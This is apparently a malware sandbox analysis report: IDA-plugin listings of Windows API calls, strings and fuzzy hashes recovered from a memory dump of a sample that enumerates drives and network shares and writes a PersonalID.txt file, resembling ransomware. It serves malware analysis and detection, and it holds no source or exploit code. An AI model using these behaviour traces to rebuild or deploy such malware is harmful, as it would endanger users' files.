                                                                                                • Associated: 0000000F.00000002.2873162135.000000000051A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 0000000F.00000002.2873162135.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 0000000F.00000002.2873162135.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_15_2_400000_E609.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: Window$CreateShowUpdate
                                                                                                • String ID: LPCWSTRszTitle$LPCWSTRszWindowClass
                                                                                                • API String ID: 2944774295-3503800400
                                                                                                • Opcode ID: a65d1e0183acb99785454671d95aa34da9e61ee796a7d373e4ca79d97c1a5a0d
                                                                                                • Instruction ID: 93e3ae8c3ab6e4512016b3ef7200399996c0305a41779b72c5d02abe3f8cd5ff
                                                                                                • Opcode Fuzzy Hash: a65d1e0183acb99785454671d95aa34da9e61ee796a7d373e4ca79d97c1a5a0d
                                                                                                • Instruction Fuzzy Hash: 08E04F316C172077E3715B15BC5BFDA2918FB05F10F308119FA14792E0C6E569428A8C
                                                                                                APIs
                                                                                                • WNetOpenEnumW.MPR(00000002,00000000,00000000,00000000,?), ref: 00410C12
                                                                                                • GlobalAlloc.KERNEL32(00000040,00004000), ref: 00410C39
                                                                                                • _memset.LIBCMT ref: 00410C4C
                                                                                                • WNetEnumResourceW.MPR(?,?,00000000,?), ref: 00410C63
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000F.00000002.2873162135.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 0000000F.00000002.2873162135.000000000051A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 0000000F.00000002.2873162135.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 0000000F.00000002.2873162135.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_15_2_400000_E609.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: Enum$AllocGlobalOpenResource_memset
                                                                                                • String ID:
                                                                                                • API String ID: 364255426-0
                                                                                                • Opcode ID: 54b312cc4ee8bd09624119d4c268e334e055f93c635bfd49589b22278edf9028
                                                                                                • Instruction ID: bd97fe2cb621df6ca28f66a093f1f6e361520364a30ff1ea4190286e2c40543e
                                                                                                • Opcode Fuzzy Hash: 54b312cc4ee8bd09624119d4c268e334e055f93c635bfd49589b22278edf9028
                                                                                                • Instruction Fuzzy Hash: 0F91B2756083418FD724DF55D891BABB7E1FF84704F14891EE48A87380E7B8A981CB5A
                                                                                                APIs
                                                                                                • GetLogicalDrives.KERNEL32 ref: 00410A75
                                                                                                • SetErrorMode.KERNEL32(00000001,00500234,00000002), ref: 00410AE2
                                                                                                • PathFileExistsA.SHLWAPI(?), ref: 00410AF9
                                                                                                • SetErrorMode.KERNEL32(00000000), ref: 00410B02
                                                                                                • GetDriveTypeA.KERNEL32(?), ref: 00410B1B
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000F.00000002.2873162135.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 0000000F.00000002.2873162135.000000000051A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 0000000F.00000002.2873162135.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 0000000F.00000002.2873162135.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_15_2_400000_E609.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: ErrorMode$DriveDrivesExistsFileLogicalPathType
                                                                                                • String ID:
                                                                                                • API String ID: 2560635915-0
                                                                                                • Opcode ID: 022c0cbaec9de31487c2f53e095b25542c98f1d89e4a27a999e0cef20fee916b
                                                                                                • Instruction ID: e48b338c548d72163c5ae3f73f283317dfaad29deff82c686574d6b9df2ed0f8
                                                                                                • Opcode Fuzzy Hash: 022c0cbaec9de31487c2f53e095b25542c98f1d89e4a27a999e0cef20fee916b
                                                                                                • Instruction Fuzzy Hash: 6141F271108340DFC710DF69C885B8BBBE4BB85718F500A2EF089922A2D7B9D584CB97
                                                                                                APIs
                                                                                                • _malloc.LIBCMT ref: 00423B64
                                                                                                  • Part of subcall function 00420C62: __FF_MSGBANNER.LIBCMT ref: 00420C79
                                                                                                  • Part of subcall function 00420C62: __NMSG_WRITE.LIBCMT ref: 00420C80
                                                                                                  • Part of subcall function 00420C62: RtlAllocateHeap.NTDLL(007F0000,00000000,00000001,00000001,?,?,?,00430E81,00000001,00000000,?,?,?,00430D1A,0044F284,?), ref: 00420CA5
                                                                                                • std::exception::exception.LIBCMT ref: 00423B82
                                                                                                • __CxxThrowException@8.LIBCMT ref: 00423B97
                                                                                                  • Part of subcall function 00430ECA: RaiseException.KERNEL32(?,?,0044F299,?,?,?,?,?,?,?,0044F299,?,00508238,?), ref: 00430F1F
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000F.00000002.2873162135.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 0000000F.00000002.2873162135.000000000051A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 0000000F.00000002.2873162135.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 0000000F.00000002.2873162135.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_15_2_400000_E609.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: AllocateExceptionException@8HeapRaiseThrow_mallocstd::exception::exception
                                                                                                • String ID: bad allocation
                                                                                                • API String ID: 3074076210-2104205924
                                                                                                • Opcode ID: e71a8035136f19667914aa2c051f0735f8eca71ec625d2fce0988d477a71a087
                                                                                                • Instruction ID: 445f5c97f97310cbd08f0009147839d9c604c92f3643d32107fe893a2d7397f3
                                                                                                • Opcode Fuzzy Hash: e71a8035136f19667914aa2c051f0735f8eca71ec625d2fce0988d477a71a087
                                                                                                • Instruction Fuzzy Hash: 74F0F97560022D66CB00AF99EC56EDE7BECDF04315F40456FFC04A2282DBBCAA4486DD
                                                                                                APIs
                                                                                                • CreateFileW.KERNEL32(?,40000000,00000002,00000000,00000002,00000080,00000000,00000000,?,?), ref: 0040F125
                                                                                                • lstrlenA.KERNEL32(?,?,00000000), ref: 0040F198
                                                                                                • WriteFile.KERNEL32(00000000,?,00000000), ref: 0040F1A1
                                                                                                • CloseHandle.KERNEL32(00000000), ref: 0040F1A8
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000F.00000002.2873162135.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 0000000F.00000002.2873162135.000000000051A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 0000000F.00000002.2873162135.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 0000000F.00000002.2873162135.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_15_2_400000_E609.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: File$CloseCreateHandleWritelstrlen
                                                                                                • String ID:
                                                                                                • API String ID: 1421093161-0
                                                                                                • Opcode ID: fed26c61a6033b0e577b5df8336c7acc378a9dba960c36cc6b3352cf07fcc5bc
                                                                                                • Instruction ID: 4e0a1a2928686de7afe91093b481d52cb6f90b47dd46c4e49af8be4df8d63ea4
                                                                                                • Opcode Fuzzy Hash: fed26c61a6033b0e577b5df8336c7acc378a9dba960c36cc6b3352cf07fcc5bc
                                                                                                • Instruction Fuzzy Hash: DF31F531A00104EBDB14AF68DC4ABEE7B78EB05704F50813EF9056B6C0D7796A89CBA5
                                                                                                APIs
                                                                                                • GetUserNameW.ADVAPI32(?,?), ref: 0041B1BA
                                                                                                  • Part of subcall function 004111C0: CreateFileW.KERNEL32(00000000,C0000000,00000001,00000000,00000003,00000080,00000000,?,00000000,?), ref: 0041120F
                                                                                                  • Part of subcall function 004111C0: GetFileSizeEx.KERNEL32(00000000,?,?,00000000,?), ref: 00411228
                                                                                                  • Part of subcall function 004111C0: CloseHandle.KERNEL32(00000000,?,00000000,?), ref: 0041123D
                                                                                                  • Part of subcall function 004111C0: MoveFileW.KERNEL32(00000000,?), ref: 00411277
                                                                                                  • Part of subcall function 0041BA10: LoadCursorW.USER32(00000000,00007F00), ref: 0041BA4A
                                                                                                  • Part of subcall function 0041BA10: RegisterClassExW.USER32(00000030), ref: 0041BA73
                                                                                                  • Part of subcall function 0041BA80: CreateWindowExW.USER32(00000000,LPCWSTRszWindowClass,LPCWSTRszTitle,00CF0000,80000000,00000000,80000000,00000000,00000000,00000000,?,00000000), ref: 0041BAAD
                                                                                                • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 0041B4B3
                                                                                                • TranslateMessage.USER32(?), ref: 0041B4CD
                                                                                                • DispatchMessageW.USER32(?), ref: 0041B4D7
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000F.00000002.2873162135.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 0000000F.00000002.2873162135.000000000051A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 0000000F.00000002.2873162135.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 0000000F.00000002.2873162135.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_15_2_400000_E609.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: FileMessage$Create$ClassCloseCursorDispatchHandleLoadMoveNameRegisterSizeTranslateUserWindow
                                                                                                • String ID: %username%$I:\5d2860c89d774.jpg
                                                                                                • API String ID: 441990211-897913220
                                                                                                • Opcode ID: bad3609ad615ec0fe5f5379fd9a4335ddd94e9fd1592faa856105229702b452d
                                                                                                • Instruction ID: 53fb4cb99f7e95a824910e08ad4bb0dd21933b0d591bc71827c80b4e91f39c04
                                                                                                • Opcode Fuzzy Hash: bad3609ad615ec0fe5f5379fd9a4335ddd94e9fd1592faa856105229702b452d
                                                                                                • Instruction Fuzzy Hash: 015188715142449BC718FF61CC929EFB7A8BF54348F40482EF446431A2EF78AA9DCB96
                                                                                                APIs
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000F.00000002.2873162135.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 0000000F.00000002.2873162135.000000000051A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 0000000F.00000002.2873162135.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 0000000F.00000002.2873162135.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_15_2_400000_E609.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: _fputws$CreateDirectory
                                                                                                • String ID: C:\SystemID$C:\SystemID\PersonalID.txt
                                                                                                • API String ID: 2590308727-54166481
                                                                                                • Opcode ID: 5832548540842a2204f96f055f6058e30fecc92858610139d61e5691a047cee7
                                                                                                • Instruction ID: 548e7949761e073c688dfdb6472f733b12cf2ebad02737ba307de427565b7e5f
                                                                                                • Opcode Fuzzy Hash: 5832548540842a2204f96f055f6058e30fecc92858610139d61e5691a047cee7
                                                                                                • Instruction Fuzzy Hash: 9911E672A00315EBCF20DF65DC8579A77A0AF10318F10063BED5962291E37A99588BCA
                                                                                                APIs
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000F.00000002.2873162135.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 0000000F.00000002.2873162135.000000000051A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 0000000F.00000002.2873162135.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 0000000F.00000002.2873162135.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_15_2_400000_E609.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: _wcsstr$Find$CloseExtensionFileNextPath
                                                                                                • String ID:
                                                                                                • API String ID: 2799698630-0
                                                                                                • Opcode ID: 0cd7ff48edd1e73b6d751478125c07911c7fe99ae9d174ea5ce4b5d2735ea3a3
                                                                                                • Instruction ID: 5ab157793dcca273c0e587975c0a14bd2b460513ddb2d20d8000ed9fb441c990
                                                                                                • Opcode Fuzzy Hash: 0cd7ff48edd1e73b6d751478125c07911c7fe99ae9d174ea5ce4b5d2735ea3a3
                                                                                                • Instruction Fuzzy Hash: 30519D70D00219DAEF20DF60DD457DEBBB5BF15308F4040BAD40A66291EB7A9AC9CF5A
                                                                                                APIs
                                                                                                  • Part of subcall function 00425208: __getptd_noexit.LIBCMT ref: 00425208
                                                                                                • __lock_file.LIBCMT ref: 00423A7D
                                                                                                  • Part of subcall function 00420E53: __lock.LIBCMT ref: 00420E76
                                                                                                • __fclose_nolock.LIBCMT ref: 00423A88
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000F.00000002.2873162135.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 0000000F.00000002.2873162135.000000000051A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 0000000F.00000002.2873162135.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 0000000F.00000002.2873162135.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_15_2_400000_E609.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: __fclose_nolock__getptd_noexit__lock__lock_file
                                                                                                • String ID:
                                                                                                • API String ID: 2800547568-0
                                                                                                • Opcode ID: 12bd1d3cff3597424f6cf441e7f6ef2d7829569bf8c2b731cad610acca9b362c
                                                                                                • Instruction ID: e9f7363e2c125346a9344b83ccdc7017391740cbbddd1805e0fe7159b8e2b74d
                                                                                                • Opcode Fuzzy Hash: 12bd1d3cff3597424f6cf441e7f6ef2d7829569bf8c2b731cad610acca9b362c
                                                                                                • Instruction Fuzzy Hash: 1EF0F631B01724AAD710AF66680275E6AB46F00339F90815FE4A09A1C1CB7C87428F59
                                                                                                APIs
                                                                                                • __lock.LIBCMT ref: 0042FB7B
                                                                                                  • Part of subcall function 00428AF7: __mtinitlocknum.LIBCMT ref: 00428B09
                                                                                                  • Part of subcall function 00428AF7: EnterCriticalSection.KERNEL32(00000000,?,004250D7,0000000D), ref: 00428B22
                                                                                                • __tzset_nolock.LIBCMT ref: 0042FB8E
                                                                                                  • Part of subcall function 0042FE47: __lock.LIBCMT ref: 0042FE6C
                                                                                                  • Part of subcall function 0042FE47: ____lc_codepage_func.LIBCMT ref: 0042FEB3
                                                                                                  • Part of subcall function 0042FE47: __getenv_helper_nolock.LIBCMT ref: 0042FED4
                                                                                                  • Part of subcall function 0042FE47: _free.LIBCMT ref: 0042FF07
                                                                                                  • Part of subcall function 0042FE47: _strlen.LIBCMT ref: 0042FF0E
                                                                                                  • Part of subcall function 0042FE47: __malloc_crt.LIBCMT ref: 0042FF15
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000F.00000002.2873162135.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 0000000F.00000002.2873162135.000000000051A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 0000000F.00000002.2873162135.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 0000000F.00000002.2873162135.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_15_2_400000_E609.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: __lock$CriticalEnterSection____lc_codepage_func__getenv_helper_nolock__malloc_crt__mtinitlocknum__tzset_nolock_free_strlen
                                                                                                • String ID:
                                                                                                • API String ID: 360932542-0
                                                                                                • Opcode ID: 92963a37b1ac55d125e1d9796c7b8053ccc5c5112960f7952bb2c963dcdaa470
                                                                                                • Instruction ID: e2ddc43a93f61bf79f0790849a809cb79cc8f4f227a559e0d4967367be19fad2
                                                                                                • Opcode Fuzzy Hash: 92963a37b1ac55d125e1d9796c7b8053ccc5c5112960f7952bb2c963dcdaa470
                                                                                                • Instruction Fuzzy Hash: 69E0BF35E41664DAD620A7A2F91B75C7570AB14329FD0D16F9110111D28EBC15C8DA2E
                                                                                                APIs
                                                                                                • VirtualFree.KERNELBASE(00000000,00000000,00008000,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 004118DD
                                                                                                • CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000000,?,00000000,?), ref: 004118E9
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000F.00000002.2873162135.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 0000000F.00000002.2873162135.000000000051A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 0000000F.00000002.2873162135.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 0000000F.00000002.2873162135.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_15_2_400000_E609.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: CloseFreeHandleVirtual
                                                                                                • String ID:
                                                                                                • API String ID: 2443081362-0
                                                                                                • Opcode ID: 361c4fcee47f9886bce79b3ac72f802e467dd4b7b05589e3f2927c820f7a912b
                                                                                                • Instruction ID: a75cf17640dcbe18a091e0aebb8a692561bc66dfcc2ddf1384dfcaf55dfbf141
                                                                                                • Opcode Fuzzy Hash: 361c4fcee47f9886bce79b3ac72f802e467dd4b7b05589e3f2927c820f7a912b
                                                                                                • Instruction Fuzzy Hash: D1E08636B415049BC7209B99ECC0B9DB374F785720F20437AD919733D047352D028A58
                                                                                                APIs
                                                                                                • Concurrency::details::_Concurrent_queue_base_v4::_Internal_throw_exception.LIBCPMT ref: 004169DF
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000F.00000002.2873162135.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 0000000F.00000002.2873162135.000000000051A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 0000000F.00000002.2873162135.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 0000000F.00000002.2873162135.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_15_2_400000_E609.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: Concurrency::details::_Concurrent_queue_base_v4::_Internal_throw_exception
                                                                                                • String ID:
                                                                                                • API String ID: 120817956-0
                                                                                                • Opcode ID: 430759de2ec21d0920f62c0ffc1a627718d321eea36c4ba58420f05cd24c7e19
                                                                                                • Instruction ID: aa06b8048d3bf760f527e7d0bbb9ad0a08af858ba63749c6f8d7f01112261dfe
                                                                                                • Opcode Fuzzy Hash: 430759de2ec21d0920f62c0ffc1a627718d321eea36c4ba58420f05cd24c7e19
                                                                                                • Instruction Fuzzy Hash: E731E3B2A006059BCB20DF68C5816AEB7F9EF45750F21823FE856D7740DB38DD448BA9
                                                                                                APIs
                                                                                                • CreateThread.KERNEL32(00000000,00000000,Function_0001F130,?,00000000,00000000), ref: 0041FA25
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000F.00000002.2873162135.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 0000000F.00000002.2873162135.000000000051A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 0000000F.00000002.2873162135.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 0000000F.00000002.2873162135.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_15_2_400000_E609.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: CreateThread
                                                                                                • String ID:
                                                                                                • API String ID: 2422867632-0
                                                                                                • Opcode ID: 0ac00649bc9f379a6b742ea92144ce4fa1e49017590e60b2748b6a8e655e84ce
                                                                                                • Instruction ID: 74150d4eedde67828055b261a2b9f98274f0c47e32cd20f87c2cefabb50f2d8a
                                                                                                • Opcode Fuzzy Hash: 0ac00649bc9f379a6b742ea92144ce4fa1e49017590e60b2748b6a8e655e84ce
                                                                                                • Instruction Fuzzy Hash: F1D05E322883147BE3140A9AAC06F867AC88B15B20F00403AB609DA1C0D9A1A8108A9C
                                                                                                APIs
                                                                                                  • Part of subcall function 00410BD0: WNetOpenEnumW.MPR(00000002,00000000,00000000,00000000,?), ref: 00410C12
                                                                                                • SendMessageW.USER32(?,00008004,00000000,00000000), ref: 0041FDA4
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000F.00000002.2873162135.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 0000000F.00000002.2873162135.000000000051A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 0000000F.00000002.2873162135.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 0000000F.00000002.2873162135.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_15_2_400000_E609.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: EnumMessageOpenSend
                                                                                                • String ID:
                                                                                                • API String ID: 1835186980-0
                                                                                                • Opcode ID: 4b855248cb889363fe6aa4b9a8dd9f39f841337135063b4ce115baa5f3e43425
                                                                                                • Instruction ID: f1b321f5059a27c682919cb5e20fd2d447803ac3e15b06371c74c2023cac73f2
                                                                                                • Opcode Fuzzy Hash: 4b855248cb889363fe6aa4b9a8dd9f39f841337135063b4ce115baa5f3e43425
                                                                                                • Instruction Fuzzy Hash: 27E02B311043406AD32097A4DC01F82BBC49F18728F00C81EF7CA6B9C1C5F1B04487ED
                                                                                                APIs
                                                                                                • CreateThread.KERNEL32(00000000,00000000,Function_0001FD80,?,00000000,00529230), ref: 0041FDD6
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000F.00000002.2873162135.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 0000000F.00000002.2873162135.000000000051A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 0000000F.00000002.2873162135.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 0000000F.00000002.2873162135.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_15_2_400000_E609.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: CreateThread
                                                                                                • String ID:
                                                                                                • API String ID: 2422867632-0
                                                                                                • Opcode ID: dcd01a2ceecdcc7afcdf07ee0c002b865cef6077f7601f89151651f24f0902f2
                                                                                                • Instruction ID: 36d07be7825d0dd215c2e58fd0e5fada4a3bc662417c17551b787912ef620d2a
                                                                                                • Opcode Fuzzy Hash: dcd01a2ceecdcc7afcdf07ee0c002b865cef6077f7601f89151651f24f0902f2
                                                                                                • Instruction Fuzzy Hash: 6FD012753C9305B7E7180BA6BC47F593A989B29B00F504036F60DD92D0DAB1F4509A5C
                                                                                                APIs
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000F.00000002.2873162135.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 0000000F.00000002.2873162135.000000000051A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 0000000F.00000002.2873162135.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 0000000F.00000002.2873162135.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_15_2_400000_E609.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: __fsopen
                                                                                                • String ID:
                                                                                                • API String ID: 3646066109-0
                                                                                                • Opcode ID: bf5cddf6cdcf292e93ea6723c994e088edc5db0ae513d1c80474abae1941b879
                                                                                                • Instruction ID: 292279633ce522dfb3aa62ab9f23dea9a591004ce3b356b458beb681742a1975
                                                                                                • Opcode Fuzzy Hash: bf5cddf6cdcf292e93ea6723c994e088edc5db0ae513d1c80474abae1941b879
                                                                                                • Instruction Fuzzy Hash: FDB0927254021C77CF012E82EC02A493B199B60764F448021FB1C181B1E6BBE66496C9
                                                                                                APIs
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000F.00000002.2873162135.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 0000000F.00000002.2873162135.000000000051A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 0000000F.00000002.2873162135.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 0000000F.00000002.2873162135.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_15_2_400000_E609.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: __wfsopen
                                                                                                • String ID:
                                                                                                • API String ID: 197181222-0
                                                                                                • Opcode ID: a3c3897a0b8e5cc1e99c40f009d05ddfac5da0d01180f44d34b11c30565e0d74
                                                                                                • Instruction ID: 060863096896a5b816ca94ba1531ddaea04f54b188c1fa908ac11e743c0bd32b
                                                                                                • Opcode Fuzzy Hash: a3c3897a0b8e5cc1e99c40f009d05ddfac5da0d01180f44d34b11c30565e0d74
                                                                                                • Instruction Fuzzy Hash: 1EB0927254020C77CE012A82EC02A497B199B516A4F408021FB0C18571A677A6A09A89
                                                                                                APIs
                                                                                                • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000010,-000003FF,-000003FF), ref: 00412966
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000F.00000002.2873162135.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 0000000F.00000002.2873162135.000000000051A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 0000000F.00000002.2873162135.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 0000000F.00000002.2873162135.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_15_2_400000_E609.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: ByteCharMultiWide
                                                                                                • String ID:
                                                                                                • API String ID: 626452242-0
                                                                                                • Opcode ID: 3190321db6851e34879c411538b69d578517b3d66b58581b09a739f1d9d4ecee
                                                                                                • Instruction ID: 3b43283c781d39060a285e1a990033b4cd03b7dd602a36c1420ec248ee7b7319
                                                                                                • Opcode Fuzzy Hash: 3190321db6851e34879c411538b69d578517b3d66b58581b09a739f1d9d4ecee
                                                                                                • Instruction Fuzzy Hash: 0411B171A00219EBDF00DF59DC41BDFBBA8EF05718F00452AF819A7280D7BE99558BDA
                                                                                                APIs
                                                                                                • _wcscmp.LIBCMT ref: 004382B9
                                                                                                • _wcscmp.LIBCMT ref: 004382CA
                                                                                                • GetLocaleInfoW.KERNEL32(?,2000000B,?,00000002,?,?,00438568,?,00000000), ref: 004382E6
                                                                                                • GetLocaleInfoW.KERNEL32(?,20001004,?,00000002,?,?,00438568,?,00000000), ref: 00438310
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000F.00000002.2873162135.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 0000000F.00000002.2873162135.000000000051A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 0000000F.00000002.2873162135.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 0000000F.00000002.2873162135.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_15_2_400000_E609.jbxd
                                                                                                Yara matches
                                                                                                Similarity
